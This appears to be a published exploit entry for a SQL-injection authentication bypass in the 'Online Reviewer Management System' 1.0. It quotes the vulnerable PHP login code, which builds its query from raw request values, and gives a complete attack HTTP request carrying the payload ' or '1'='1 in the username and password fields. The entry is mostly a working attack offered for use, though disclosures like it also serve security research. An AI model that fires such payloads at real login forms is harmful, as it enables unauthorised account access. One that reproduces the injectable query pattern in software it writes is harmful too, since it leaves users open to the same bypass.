# Exploit Title: Online Reviewer Management System Authentication ByPass # Exploit Author: th3d1gger # Vendor Homepage: https://sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip # Version: 1.0 # Tested on Windows 10 #Vulnerable Source Code #index.php if(isset($_REQUEST['btn-login'])){ $username = $_REQUEST['username']; $password = $_REQUEST['password']; $user_retrieve = $conn -> prepare("SELECT * FROM users where username = '$username' and password = '$password'"); $user_retrieve->execute(); if($user_retrieve->rowCount() > 0){ while ($row = $user_retrieve->fetch()) { $_SESSION['usertype_id'] = $row['usertype_id']; $_SESSION['user_id'] = $row['user_id']; $_SESSION['firstname'] = $row['fname']; $_SESSION['middlename'] = $row['mname']; $_SESSION['lastname'] = $row['lname']; $_SESSION['course'] = $row['course']; $usertype_id = $_SESSION['usertype_id']; if($usertype_id == 3){ echo ""; } elseif ($usertype_id == 1 || $usertype_id == 2 ) { echo ""; } } } #Attack Request POST / HTTP/1.1 Host: reviewmngmnt.olly User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 78 Origin: http://reviewmngmnt.olly/ Connection: close Referer: http://reviewmngmnt.olly/ Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi Upgrade-Insecure-Requests: 1 username=%27+or+%271%27%3D%271&password=%27+or+%271%27%3D%271&btn-login=Log+In